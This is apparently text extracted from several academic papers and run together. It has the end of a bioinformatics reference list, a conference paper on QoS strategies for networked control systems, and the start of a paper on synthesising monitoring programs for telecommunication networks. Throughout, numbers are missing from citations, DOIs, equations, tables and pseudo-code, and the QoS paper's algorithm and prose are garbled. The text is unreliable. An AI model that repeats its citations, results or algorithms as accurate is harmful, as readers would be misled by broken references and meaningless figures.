interactive comparative genomics of microbes on the web. bioinformatics ( ): – doi . /bioinformatics/btr . salzberg sl, phillippy am, zimin av, puiu d, magoc t, koren s, treangen t, schatz mc, delcher al, roberts m, marcais g, pop m, yorke ja. . gage: a critical ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . /science. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.plaphy. . . http://www.ncbi.nlm.nih.gov/nuccore/nc_ . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /nar/gkr http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /peerj-cs. evaluation of genome assemblies and assembly algorithms. genome research ( ): – doi . /gr. . . sayers ew, barrett t, benson da, bryant sh, canese k, chetvernin v, church dm, dicuccio m, edgar r, federhen s, feolo m, geer ly, helmberg w, kapustin y, landsman d, lipman dj, madden tl, maglott dr, miller v, mizrachi i, ostell j, pruitt kd, schuler gd, sequeira e, sherry st, shumway m, sirotkin k, souvorov a, starchenko g, tatusova ta, wagner l, yaschenko e, ye j. . database resources of the national center for biotechnology information. nucleic acids research (database issue):d –d doi . /nar/gkn . schwarz rf, ng cky, cooke sl, newman s, temple j, piskorz am, gale d, sayal k, murtaza m, baldwin pj, rosenfeld n, earl hm, sala e, jimenez-linan m, parkinson ca, markowetz f, brenton jd. . spatial and temporal heterogeneity in high-grade serous ovarian cancer: a phylogenetic analysis. plos medicine ( ):e doi . /journal.pmed. . stajich je, block d, boulez k, brenner se, chervitz sa, dagdigian c, fuellen g, gilbert jgr, korf i, lapp h, lehväslaiho h, matsalla c, mungall cj, osborne bi, pocock mr, schattner p, senger m, stein ld, stupka e, wilkinson md, birney e. . the bioperl toolkit: perl modules for the life sciences. genome research ( ): – doi . /gr. . sullivan mj, petty nk, beatson sa. . easyfig: a genome comparison visualizer. bioinformatics ( ): – doi . /bioinformatics/btr . touchon m, rocha e. . causes of insertion sequences abundance in prokaryotic genomes. molecular biology and evolution ( ): – doi . /molbev/msm . turnbaugh pj, ley re, hamady m, fraser-liggett cm, knight r, gordon ji. . the human microbiome project. nature ( ): – doi . /nature . vanneste k, baele g, maere s, peer yvd. . analysis of plant genomes supports a wave of successful genome duplications in association with the cretaceous– paleogene boundary. genome research ( ): – doi . /gr. . . wakasugi t, tsudzuki j, ito s, nakashima k, tsudzuki t, sugiura m. . loss of all ndh genes as determined by sequencing the entire chloroplast genome of the black pine pinus thunbergii. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . wicke s, müller kf, de pamphilis cw, quandt d, wickett nj, zhang y, renner ss, schneeweiss gm. . mechanisms of functional and physical genome reduction in photosynthetic and nonphotosynthetic parasitic plants of the broomrape family. the plant cell ( ): – doi . /tpc. . . wolfe kh, morden cw, palmer jd. . function and evolution of a minimal plastid genome from a nonphotosynthetic parasitic plant. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . yahara k, didelot x, ansari m, sheppard s. . efficient inference of recombination hot regions in bacterial genomes. molecular biology and evolution ( ): – doi . /molbev/msu . ankenbrand et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /gr. http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /molbev/msm http://dx.doi.org/ . /nature http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /molbev/msu http://dx.doi.org/ . /peerj-cs. paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the design of qos guarantee strategy framework for networked control system yang weixia school of computer science and engineering xi'an technological university xi'an, , shaanxi, china e-mail: @qq.com xu fei a , wang shaochang b school of computer science and engineering xi'an technological university xi'an, , shaanxi, china e-mail: a @qq.com b @qq..com abstract—for networked control systems such as packet loss and delay of the basic problems, this article launches the research from the perspective of network scheduling optimization, build the qos semantic model and service model for networked control, puts forward the multi-level qos guarantee strategy deployment algorithm and qos, qos access algorithm components; on a class of networked control middleware prototype system of network resources to meet of components and component deployment simulation experiment, the results show that by properly adjusting the bandwidth of the task node and priority, and controlling the efficient transmission of information, so as to shorten the network time delay, improve the network performance, increase the efficiency of the controller. keywords-networked control; middleware; resources to meet; components deployed i. introduction the networked control system brings many advantages to the control system through network resource sharing, and introduces new challenges to the control circle. the complexity of the network control system is introduced by control system in the network of the characteristics of decision, such as network induced delay, packet loss, single packet of data and multiple packet transmission, packet random sequence and network scheduling problem, this article called "web services digital constraint" [ ].network control applications require the use of heterogeneous, diverse resources, in general use of these resources sharing, more requires collaboration between the various tasks, resource scheduling, task execution is complicated. the current network infrastructure and are based on "best effort" basis, quality of service is not fully guaranteed, multiple services collaboration use resources, performance and efficiency is also easy to cause the drop. addressing these issues requires the introduction of the qos mechanism. ian foster and other scholars have proposed the qos framework based on the globus toolkit -- the globus architecture for reservation and allocation, gara [ ][ ], which provides the middleware core layer and the end-to-end qos guarantee for the service layer. gara use "gramm for resource management, defines the generic description mechanism for all kinds of heterogeneous resources and provide unified control interface, but the lack of extensibility, implementation architecture can't applicable to the general field of networked control request. professor at the university of cardiff rashid qos management framework - g - qosm [ ], the use of the resources of qos information registration, discovery and selection of reserve resources, resource allocation and task scheduling adaptive adjustment, the framework is the complete lack of qos semantic modeling ability, change can not be very good to the business environment. zeng et al. [ ][ ] proposed the service composition middleware based on maximization of user satisfaction, and gave two strategies for local task-level service selection and global collaborative allocation. the local service chooses to use the metric and weighted two steps to measure the service in the multidimensional qos attribute. literature [ ] points out that the heterogeneous network environment put forward requirements definition scheme based on a known as the elastic constraints, the multi-objective problem is modeled as a compound option of knapsack problem, based on dynamic programming algorithm for dynamic constraint, but it is difficult to clearly determine the application of customers' needs.s.s hakkottai et al. [ ] in ad hoc wireless self-organizing network research, puts forward the idea of "cross layer design" in comprehensive considers the relationship of the protocol stack layers and retain the original layered protocol stack structure, on the basis of breaking the tcp/ip network hierarchy middle layer and the communication between the limit, supplement and designed a new type of network protocol stack, allowing interaction between the layers of communication protocol stacks. xian university of electronic science and technology of yi-lin chang and others [ ] in the cross layer design, on the basis of the five layers of typical network architecture was proposed and "cross-layer perception" concept, will be with the idea of cross-layer design, promotion to the network on the de facto standard five levels. / most current network protocol implementations provide only partial qos functionality. networked control systems is to run over in the basic network services, the simple network qos mechanism can guarantee the qos requirements, and the existing qos guarantee strategy are based on "the best" service mechanism, and cannot provide components oriented middleware platform support. this chapter first analysis of networked control environment context factors, using the method of side oriented qos based semantic model of real-time system, reconstruction of networked control system service quality in the hierarchical structure and establish the corresponding international conference on sensor network and computer engineering (icsnce ) management model, by extending the object management group interface definition language, will establish the qos management model integrating into the kernel of the middleware services, and construct the field oriented control service qos management framework, finally through the simulation experiments verify the qos management mechanism of effectiveness. the structure of this paper is as follows: section introduces the qos semantic model and qos service model for network-oriented control; section introduces qos scheduling framework design; section introduces the qos component access algorithm and qos component deployment algorithm. section carries out the simulation experiment to verify the above strategy framework and the effectiveness of the algorithm. ii. qos semantic model this section presents a qos semantic model, its purpose is to establish an open, extensible to define, qos data exchange and interoperation model, does not allow the presentation logic to qos number as the qos parameters, qos management level, the change of qos management mechanism and fundamental changes, decouple the presentation logic and processing logic, so as to better adapt to the various business requirements under the networked control systems. the semantic model is composed of qos model and qos management model. a. the metamodel qos metamodel defines qos said system required by the atomic data structure, it said in the qos system plays a basic structural role, not only to enhance the qos rigor of said system, and lay a foundation for the expansion of the qos definition. the qos model representation system is shown in figure below. figure . qos meta model structure  model root element is the root element of the inheritance hierarchy in the metamodel, which is the most basic abstract block.  identifier is the string that the model element identifies itself, which is unique in the entire namespace.  category : abstract building blocks used to derive data types and class objects. it is an aggregation of methods and properties.  datatype which defines the basic data types used to describe qos, construct data types, template data types, and custom data types.  class: an abstraction of the collection of objects of the same behavior, attributes, relationships, and semantics.  schema: a framework consisting of one or more classes.  qualifier is the specification and constraint of elements such as class, attribute and its outline.  event can be located in time and space and can take place with practical significance.  rule is a policy used to indicate a class's status migration when an event occurs. b. qos management model the control application is a set of application artifacts with qos characteristics. the component instance is the physical unit that is deployed to the instantiation in the component framework, and the runtime component instance can be represented as a process, thread, or other autonomous running unit in the component container environment. an application configuration graph, which is called a qos component, is made up of abstract examples. figure . qos semantic component application configuration diagram from the component instance to the directed edge, where the output is input. the qos feature of the component is shown as follows. in the above equation, the values of qos attribute values are all real types, in which the qos attribute list is represented and required by the component instance respectively. the other is the list of system resources occupied by the component instance runtime, which is provided by the system resource management service. iii. qos strategy framework a. frame structure this section is presented based on the strategy of qos monitoring and the safeguard mechanism, it is running the qos framework core components, not only for the resource service management and the operation of the communication network to provide performance guarantee, also the qos parameters of dynamic monitoring in operation, to provide qos strategy execution. resources service according to the requirements of the performance of communication network, and these requirements is mapped to a communication network qos standards, use appropriate protocol in qualifier attribute classifier method schema namespace datatype class event modeelement identifierrule * * * * …* * * * ... c c ic  i c  i c j c n c ( , , ) component demand provide qos qos res qos [ , ,..., ], , ,..., dem dem dem dem demand m i qos q q q q double i m   [ , ,..., ], , ,..., res res res res k i res q q q q double i k   [ , ,..., ], , ,..., pro pro pro pro provide n i qos q q q q double i n   international conference on sensor network and computer engineering (icsnce ) communication network and qos strategies for resource management to provide satisfactory service data transmission performance. the framework is shown in figure below. figure . qos management framework b. qos requirements mapping mechanism to be able to provide effective qos support for control applications, you must be able to define clear qos requirements from the user's expectations. here, the concept of group of work (gow) is presented, representing the minimum working granularity unit that can be processed by the resource service. an application can usually consist of several working groups, each of which can be processed by the resource service according to the corresponding qos parameters. the process of extracting explicit qos characteristics and requirements from the control application is shown in the figure below. figure . qos requirements mapping process the process of extracting the gow from the application and classifying it by qos is as follows: where, represents a network control application, represents a gow, and represents a qos feature. when gow classified according to the qos characteristics, qos requirements parameters, can be extracted from an application, the user can then according to the qos parameters and other partners to negotiate, together to make an application to determine the level of qos based on complete. the specific scheduling of resource services is performed in the middle tier, so the process can be seen as an implementation from the application layer business abstraction to the mid-tier qos mapping. c. qos component access algorithm the problem of component access can be described as: the function configuration diagram for the composite component request is mapped to the corresponding component instance; ( ) according to the service qos requests and system resource condition, choosing component instance specific qos model, satisfied, and the equation between adjacent component instance can be set up, and all the component instance resources required to be met. in the following figure, an example of qos component function configuration diagram and qos diagram is given, and the process of the component instance access algorithm is given. c c c c c qm qm qm qm qm qm qm qm qm qm qm qm qm figure . the service component combination process service composition for component steps, you will first need to choose for component instance qos model satisfy the relationship is formed between adjacent component instance, unit construction planning according to the component function configuration diagram cg and qos of component specifications constructing service qos diagram qg. the specific algorithm flow is as follows: algorithm : heuristic component access algorithm. input: component function configuration diagram and system current available resource collection. output: optional qos component configuration set -- configset[] a) the edge[n] array is placed in each edge of the initialization function configuration diagram (cg). b) find all source nodes and target nodes in edge[n] and place them in the array of startpt[] and endpt[]; c) foreach u in startpt d) [ ]visited u false ; e) foreach w in endpt f) [ ]visited w false ; g) configset   ; h) foreach u in startpt { , ,..., } { , ,... } { , ... } i i i i n e f j n ncsapp g g g q q q q q q   control applications network performance evaluation build service evaluation the input interface the input interface resource discovery qos consultation and renegotiation qos monitoring qos extraction and mapping output interface reserved resources qos distribution and redistribution qos adaptive qos resource usage measurement resource management intelligence bandwidth resources control algorithm resources controller resource sensor resources network qos mechanism and strategy qos monitoring qos adaptive the application layer the middle layer resource layer the network layer international conference on sensor network and computer engineering (icsnce ) i) tmp qc   ; j) if [ ]visited u false k) then call ( , ) tmp construct u qc ; l) procedure ( , )construct u qc m) { n) [ ]visited u true ; o) foreach [ ] i qm qosprofile u { p) item qc   ; q) foreach t i q qm { r) if( all_satisfied ==true ) { s) q_satisfied = flase; t) foreach [ ] j qm qosprofile v { u) if (satisfied( t q )==true) v) _ _ { } j qc item qc item qm  ; w) q_satisfied =true; x) } y) } z) } aa) if ( []u startpt ){ bb) _qc qc qc item  ;} cc) else if( u startpt ){ dd) foreach item qc { ee) if( i qm item ) ff) _qc qc qc item  ; gg) } hh) } ii) foreach []v entpt { jj) ( , )construct v qc ; kk) } ll) } firstly, the function configuration diagram of the component is initialized, and the source and target nodes in the graph are placed into the corresponding data structure. set the temporary edge set to empty; then the heuristics generate configuration set function for each node of the source node; in this function, for each qos configuration item, check whether the qos attribute is satisfied in the instance of each component, and if it is satisfied, then check whether the component instance of the destination node satisfies the qos configuration item; and the recursive method is used until each feasible qos configuration item is output and the result is output. iv. simulation experiment in this section, the simulation experiment is used to verify the core algorithm of the qos management framework and related hierarchical strategy design. definition : qos requirements meeting rate (qrmr: qos requirements meet rate), assuming that in all service application requests, the service application is successful, the qos demand satisfaction rate is defined as: the simulation experiment of this paper compares qrmr with different component selection algorithms, as shown in fig. . the simulation experiment environment consists of four pcs networked with qos component container. figure . qos simulation environment network structure qos simulation experiment environment hypothesis, influencing qrmr factors for resource constraints and service resource requirements. simulation experiment, repeatedly randomly from every seconds to create a composite service request, the simulated four composite service function configuration diagram of components and service components deployed as shown in figure , and after a - calculated feasible qos configuration resource requirements as shown in table . figure . the simulation experiment component function configuration diagram in the experiment, the qos component only reserved management for the cpu resources, respectively representing the cpu resources. request request success qrmr total  p p p p international conference on sensor network and computer engineering (icsnce ) table . the composite service qos configuration of resource requirements service marks feasible qos configuration qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % qm % % % % the qrmr of the statistical system is simulated every second. the duration of each successful service is set in seconds, and when the service is completed, the resource will be recovered by the corresponding qos component resource management yuan service.in the experiments r capability , r capability , r capability and r capability the size is set to %.in the component access algorithm, , , ,r r r r the weights of resources are set respectively . r q  , . r q  , . r q  , . r q  . figure . different components access algorithm’s qrmr therefore, simulation negotiation algorithm is obtained by using the exhaustive method of integer programming optimal solution. figure shows the qrmr changed over time. can see from the result of the experiment at the beginning of the simulation of two kinds of algorithm can achieve higher success rate, but as the simulation process, the heuristic member access algorithm qrmr meet rate is around . , more than the basic component selection algorithm. the results show that the heuristic adjust weight and through service resources through negotiation methods, qrmr can improve. can see from the result of the experiment at the beginning of the simulation of two kinds of algorithm can achieve higher success rate, but as the simulation process, the heuristic member access algorithm qrmr meet rate is around . , more than the basic component selection algorithm. the results show that qrmr can be improved by heuristic regulation of resource weight and through service resource negotiation. v. conclusion first introduces the basic requirements for networked control systems of qos, shows an open and scalable qos semantic model, its constituent elements including contract for qos parameters, qos, qos model, specification of qos, qos parameters, etc., makes the service components have the ability to adapted to network resources. based on the analysis of qos attribute of service component, the establishment process of component service is described, and a dynamic algorithm of component service group is proposed. at the same time, the design for the application layer, middle layer and resource layer and network layer qos strategy, finally designs the dynamic service components based on resource distribution of container deployment simulation experiment, this section is verified the proposed qos goal-driven dynamic deployment effectiveness of the algorithm. references [ ] xu fei, liu mingyong, li wenbai, lei xiaokang. study on the digital redesign of robust controllers for parametric uncertainty systems [j]. systems engineering and electronic technology, , : - . [ ] i.t. foster, c. kesselman,c. lee et al a distributed resource managementarchitecture that supports advance reservation and co- allocation[a]. in: proceedings of the seventh international workshop on quality of service[c], london, uk, : - . [ ] poza-lujan jose-luis, posadas-yagüe juan-luis.distributed sensor architecture for intelligent control that supports quality of control and quality of service. sensors (switzerland), ( ), : - . [ ] r. j. al-ali, k. amin, g v. laszewski et al. an ogsa-based quality of serviceframework [j]. lecture notes in computer science, , : - . [ ] hakiri akram,berthou pascal.supporting sip-based end-to-end data distribution service qos in wans.journal of systems and software, ( ): - . [ ] l. z. zeng, b. benatallah,a. h. h. ngu et al. qos-aware middleware for web services composition[j]. ieee transactions on software engineering, , ( ): - . [ ] m. wieczorek, s. podlipnig, r. prodan et al bi-criteria scheduling of scientificworkflows for the gird [a]. in: proceedings of the th international symposium oncluster computing and the grid (ccgrid ) [c], lyon, france: ieee computersociety, : - . [ ] shakkottai s, rappaport t, karlsson p. cross-layer design for wireless networks. ieee communications magazine, , ( ): - . [ ] a study on the movement and distribution of nodes with multiple entry and exit regions. computer research and development, , ( ): - . s s r r r r s s submitted january accepted july published august corresponding author man tianxing, mantx @gmail.com academic editor shlomi dolev additional information and declarations can be found on page doi . /peerj-cs. copyright tianxing et al. distributed under creative commons cc-by . open access reconfigurable monitoring for telecommunication networks man tianxing , vasiliy yurievich osipov , alexander ivanovich vodyaho , andrey kalmatskiy , natalia alexandrovna zhukova , sergey vyacheslavovich lebedev and yulia alexandrovna shichkina itmo university, saint petersburg, saint petersburg, russia saint-petersburg institute for informatics and automation of the russian academy of sciences, saint petersburg, saint petersburg, russia st. petersburg state electrotechnical university, saint petersburg, saint petersburg, russia google, new york, ny, united states of america abstract this article addresses the monitoring problem of the telecommunication networks. we consider these networks as multilevel dynamic objects. it shows that reconfigurable systems are necessary for their monitoring process in real life. we implement the reconfiguration abilities of the systems through the synthesis of monitoring programs and their execution in the monitoring systems and on the end-user devices. this article presents a new method for the synthesis of monitoring programs and develops a new language to describe the monitoring programs. the programs are translated into binary format and executed by the virtual machines installed on the elements of the networks. we present an example of the program synthesis for real distributed networks monitoring at last. subjects adaptive and self-organizing systems, agents and multi-agent systems, computer networks and communications keywords monitoring system, complex object model, abstract machine, telecommunication network introduction nowadays, the success of human activity in many areas largely depends on the efficiency of the functioning of telecommunication networks. telecommunications networks today are used in a variety of fields of human activity. thus, the use of radar and radar-optical data to solve a massive class of problems in the field of transport, agriculture, classification of area and point objects, monitoring of anthropogenic activities, and other tasks seem to be extremely promising. at least a dozen of new radar satellites are planned to be launched in the coming years, all cars today are equipped with radar. the intelligent processing of this data requires the use of edge and cloud computing, which entails the new challenges to the telecommunication network design. damage or incorrect operation of such networks can be a reason for severe losses. so, it is necessary to have adequate tools and methods for maintaining such networks. it can be done through permanent monitoring. monitoring ensures safety operation, quick detection, and prevention of network failures. many factors cause changes in the structure, the state, and the behavior of the networks. thus, there is a need to reconfigure monitoring how to cite this article tianxing m, osipov vy, vodyaho ai, kalmatskiy a, zhukova na, lebedev sv, shichkina ya. . reconfig- urable monitoring for telecommunication networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:mantx @gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. processes. reconfigurable monitoring processes should allow us to gather the data about dynamic telecommunication networks and process them according to the current state of these networks and estimations of their expected use. in the telecommunication networks, objects of monitoring are multiple technical devices of end-users. sets of parameters characterize the state of the objects and their elements. centralized and decentralized schemes for object monitoring are used. centralized schemes assume that monitoring systems gather data from objects. also, data can be gathered by the objects and transferred to the monitoring systems. in both schemes, predefined processes are commonly used. gathering all possible data leads to a significant increase in network traffic. when data is partially collected, it does not allow quickly to detect failures of the objects, identify their reasons. for the reconfiguration of monitoring processes, business rules can be used. the rules define processes behavior for different known situations. this approach is well applicable for monitoring when networks have permanent structures and permanent conditions of use. the problem of monitoring of dynamic networks remains unsolved. to solve the problem monitoring systems must have abilities to build and rebuild the monitoring processes dynamically. in the article, we propose a new method for building monitoring processes based on using the theory of synthesis. to execute the processes a new language and a new virtual machine (vm) are developed. the rest of the article is structured as follows. in the second section, the capabilities of the existing monitoring systems are analyzed. it is shown that for dynamic telecommunication networks reconfigurable systems have not been considered until now. then we describe monitoring processes and propose new models for monitoring programs and the method for their synthesis that allow develop reconfigurable monitoring systems. in the fourth section we present the implementation of the proposed method, which contains the description of the language for monitoring programs, a compiler for the language, and a virtual machine that is capable of executing the compiled monitoring programs on end-user devices. in the fifth section, a case study is given to prove the effectiveness of the method. the last section is the conclusion. materials & methods related work today monitoring systems are used almost in all subject areas –medical (baig et al., ; mukhopadhyay, ; sohn et al., ; yang et al., ; shichkina et al., ), environment (gaikwad & mistry, ; kumar, kim & hancke, ), social network (chakravarthi, tiwari & handa, ), energy (eissa, elmesalawy & hadhoud, ), production (singh, gernaey & gani, ), urban, economy (bello et al., ; sakhardande, hanagal & kulkarni, ), agriculture (suma et al., ), transport (shichkina et al., ), fishery (raju & varma, ), etc. for many subject areas, including telecommunication, monitoring systems are playing a critical role. in traditional monitoring systems (zabbix, http://www.zabbix.com/), (nagios, http://www.nagios.org/), (zenoss, http://www.zenoss.org/), (pandora fms https: tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.zabbix.com/ http://www.nagios.org/ http://www.zenoss.org/ https://pandorafms.com/ https://pandorafms.com/ http://dx.doi.org/ . /peerj-cs. //pandorafms.com/), (icinga https://icinga.com/), (sensu http://sensu.io/), (groundwork monitor https://www.gwos.com/), data is collected and then transmitted to monitoring systems in the form of the data streams. the data is processed by monitoring systems which have a distributed tree structure. each element can collect and process data from multiple objects. the higher-level elements aggregate the data processing results of the lower-level elements. the tree structure allows the monitoring systems to have a sufficiently high level of performance. if the observed object changes and data is generated, redesign of the monitoring systems is a necessary process. systems redesign assumes active involvement of software architects and programmers. in the past few years, the monitoring systems have evolved significantly. developed monitoring systems are based on the integration of multiple modern technologies (morgan & o’donnell, ). in particular, in these systems, data is collected using internet of things technologies (maksymyuk et al., ; myint, gopal & aung, ; raju & varma, ; sakhardande, hanagal & kulkarni, ; suma et al., ; yang et al., ). data processing employs statistical methods, data mining algorithms, and machine learning algorithms (ge, song & gao, ). these monitoring systems are a type of adaptive systems. they assume changes in both data gathering processes and processes of data processing. adaptive systems use flexible data processing models (cabal-yepez et al., ; dovžan, logar & Škrjanc, ) or business rules (al mamun et al., ; koetter & kochanowski, ) to build and rebuild processes. the likelihood of their ability to adapt in different cases depends on the composition of the selected business rules and the defined values of customizable parameters of the processing models (singh, gernaey & gani, ). the reconfigurable monitoring systems have advanced capabilities for adaptive data gathering and processing. the features of reconfigurable systems are discussed in (korableva, kalimullina & kurbanova, ; lyke et al., ). in monitoring systems, reconfiguration operations can be considered at several levels: sensor level, embedded system level, and application level. at the sensor level, reconfiguration problems are solved by developing new programmable sensors (myint, gopal & aung, ). the new programs are uploaded for updating the logic of the sensors. for the adaptation of the embedded monitoring systems, they equip with reconfigurable data preprocessing modules (cabal-yepez et al., ). at the application level, the adaptability is achieved through customizable interfaces (fu, ), usage of genetic algorithms (thompson, ), and so on. it is also possible to synthesize new configurations for the systems and their components at the level of field-programmable gate arrays (cong et al., ; cong & minkovich, ; lysecky, vahid & tan, ; rubin & dehon, ). for implementing reconfigurable systems, several methods have been proposed. in (morgan & o’donell, ), service-oriented architectures of reconfigurable systems are presented. the problems of message routing and service orchestration in such systems are discussed. technological solutions for building reconfigurable systems are given in (silva, marques & lopes, ). one of the limitations of the existing systems is that they cannot reconfigure themselves dynamically. for dynamic reconfiguration, they have to be able to synthesize programs tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://pandorafms.com/ https://pandorafms.com/ https://peerj.com https://pandorafms.com/ https://icinga.com/ http://sensu.io/ https://www.gwos.com/ http://dx.doi.org/ . /peerj-cs. for data gathering and data processing and execute them. some of the processes should be performed in the monitoring systems and some of the end-user devices. to date, only a few dynamically reconfigurable systems exist. one of such systems has been developed for monitoring the status and performance of a supercomputer network (stefanov et al., ). the monitoring system is considered as a set of subsystems. the subsystems process data about the performance of one or more tasks. performance metrics are calculated on the fly. to this purpose, a program module is dynamically created for each process that is performed to solve the general task, and the transmission paths for the calculated metrics are dynamically determined. the module oriented architecture of the systems and their ability to create the modules dynamically make them able to adapt to new data sources and new processing methods. when creating a new module, the nodes on which it will be executed are selected based on the current load on the computer network. as a result, a balanced load of the nodes is ensured. the nodes of the system can process a part of the data about the state of the network. with these additional resources for solving the monitoring problems are obtained. the results of using these monitoring systems have shown that they allow solving the tasks of monitoring of supercomputer networks.reconfigurable systems and dynamically reconfigurable systems have not yet been developed in the field of telecommunications. multilevel synthesis of monitoring programs monitoring objects, processes, and programs in telecommunication networks telecommunication networks have a multilevel structure. the elements of the higher levels are groups of objects. within the lower levels, separate objects are considered. these objects are end-user devices. the components and the subcomponents inside characterize them. there are multiple links between the elements at all levels. monitoring processes are oriented on providing data about the state of the end-users’ devices to the customer service. these devices can gather data about their state and process it. monitoring systems can interact with the devices. within the interaction, data can be received from the devices, and commands on data gathering and data processing can be sent to them. the devices can perceive both separate commands and programs that contain multiple commands. monitoring programs are built and rebuild by monitoring systems. new programs are built-in multiple cases, such as changes in the structure, state, or behavior of the devices or definitions of new requirements to the results of the monitoring. requirements can refer to both the output data about the state of the network and the conditions of the monitoring, for example, admissible time modeling, accuracy and reliability of the models, consumed technical resources, etc. there are two primary sources of data about the state of the devices. they are the messengers that are sent from the devices and the log files that they produce. the log files are sequences of records that describe events registered by the devices. related data on factors affecting the network operation can be received from other sources. tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the structure of the monitoring process. full-size doi: . /peerjcs. /fig- the operators of the customer service define the requirements for the results of the monitoring. figure represents the structure of the monitoring process. according to fig. , monitoring processes assume gathering data about the target objects (end-user devices). current models of target objects are built using gathered data. these models reflect the state of the objects based on available data. current models are compared with the required models. they are defined according to the requirements of the end-users (operators of customer service). usually, these two models do not match. current models can have many undefined parameters in comparison with the required models. if the models do not match, then new monitoring programs are synthesized. possible ways of transitions between current and required models are considered to synthesize new programs. each transition determines additional elements of data that are needed to reach the target model. thus, after constructing sequences of transitions, it becomes known what data should be gathered. new monitoring programs contain sequences of commands that allow gathering required data elements. the formally monitoring process pr can be defined as pr :o′→o′′ where o′ is the model that reflects the state of the objects in the network. the model o′ is the current model that is build using gathered data. the model o′′ is the model that is required by the user. the monitoring processes are targeted at building current models that match the required models. the synthesis of monitoring programs is an essential part of the monitoring processes. synthesized programs are defined as the complement of o′′concerning o′: prg=o′′\o′={e∈o′′|e ∈o′}. the synthesis of the monitoring programs is ensured through the following: • the networks are commonly described in discrete time and discrete space. thus automata are used as the models of the networks. automata describe the states of the networks. since there are too many possible states, some of them can be unknown, it is not possible to describe all the states of the automata apriori. due to that relatively finite tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. automata are used (osipov, ). they are finite only for one moment of time. at each time step, all the parameters of the automata can be redefined. • traditional methods of synthesis have high computational complexity. the complexity can be reduced if we take into account the multilevel structure of the networks. to synthesize models of objects with multilevel structure multilevel methods of synthesis can be used. compared to single-level methods, they allow increase the speed of the synthesis of the required programs in times. it is achieved due to the fact that the number of the elements in the models at upper levels is small in relation to the lower levels. • the synthesized programs can be described using a new language. it is oriented on describing the programs for monitoring of telecommunication networks. the programs that are written using this language can be compiled and executed on end-user devices. automata models for programs synthesis the models of the objects are multilevel structures that represent the objects as multiple sets of parameters. sets of parameters and separate parameters are linked within separate levels and between the levels. we suggest using multilevel automata models to synthesize the programs of monitoring for the objects that assume gathering information at different levels. the model of the automata at one level can be defined in the following way (osipov, ; osipov et al., ): < ai, ao, as, ar>, where ai - a set of admissible input data, ao - a set of admissible output data, as - a set of admissible internal states, ar - an admissible set of transition functions between the elements of the set of input data and the elements of the set of output data. so, the entire multilevel model is < < ai , ao , as , ar > ; < ai , ao , as , ar > ; ..... < ai n, aon, asn, ar n> >, where the super index defines the level of the automata model. at each step of program synthesis, automata can be in one of the admissible states. within each step, the sets of admissible states and transition functions are rebuilt, taking into account the achieved state and the conditions of synthesis. thus the automata at step r is defined as: < ir, or, sr, fr, air− , aor− , asr− , arr− > , where i - input data, o - output data, s - internal state, f - transition functions (conditions). parameters i, o, s, r are defined for the step r and parameters ai, ao, as, ar - for the step r- . method of synthesis of monitoring programs the method allows synthesizing programs for objects monitoring in conditions when the current and the target models of the objects are defined. it is required to gather data about the objects that are necessary to move towards required models from current models. the method uses direct and backward inference. the direct inference is used to prove that the transition between models is possible and that the target model exists. as a result of the direct proof, multiple sequences of transitions can be defined. the backward inference allows restoring programs from the results of the proof. the inference is carried out according to the scheme mirrored to direct inference. tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the conditions, when the existence of the target models cannot be proved, the possibilities of changing the models can be considered. in the automata model for program synthesis, the set of input data elements {ds} are defined according to the current model of the object, the set of output data elements {dw} are elements of the target model of the object. transition functions fzv reflect links between elements of the models: fzv(dzve) -> (dzva), where e = [ , ez] indicates elements of the models that are required to achieve an element indicated as dzva. method for building sequences of transitions between object models based on direct inference below the description of the method is given: input data. {ds} - the sets of the input data elements; {dw} - the sets of the output data elements; fzv - transition functions between the elements. output data. transitionsequence - sequences of transitions that allow reach elements {dw} of the target model having elements {ds} of the current model. the pseudo code of the method is the following: function findachievableelements(maxlevel, m, currentm, targetm) is . for each l in [maxlevel.. ] do . for each i in [ ..m.funconditions[l].length] do . if checkcondition(m.funconditions[l][i]) == true do . elementpairs = cartesianproduct(currentm.elements[l], targetm.elements[l]) . for each j in [ ..elementpairs.length] . if proftransition(m.vzlinkingfun[l][i](elementpairs[j].first, elementpairs[j].second)=true do . m.achievedfrom[l] = add(m.achievedfrom[l], elementpairs[j].first) . m.achievedto[l] = add(m.achievedto[l], elementpairs[j].first) . m.achievedwith[l] = add(m.achievedwith[l], m.vzlinkingfun[l][i]) . m.achivedwhile[l] = add(m.achivedwhile[l], checkcondition[l][i]) . remove(m.nonproven[l+ ], elementpairs[j].second) . else . m.nonproven[l]= add(m.nonproven[l], elementpairs[j].second) . end . if m.nonproven[l].length != && maxlevel != do . findachievableelements(maxlevel- , m, currentm, targetm) . end . return m tianxing et al. ( ), peerj comput. sci., doi . 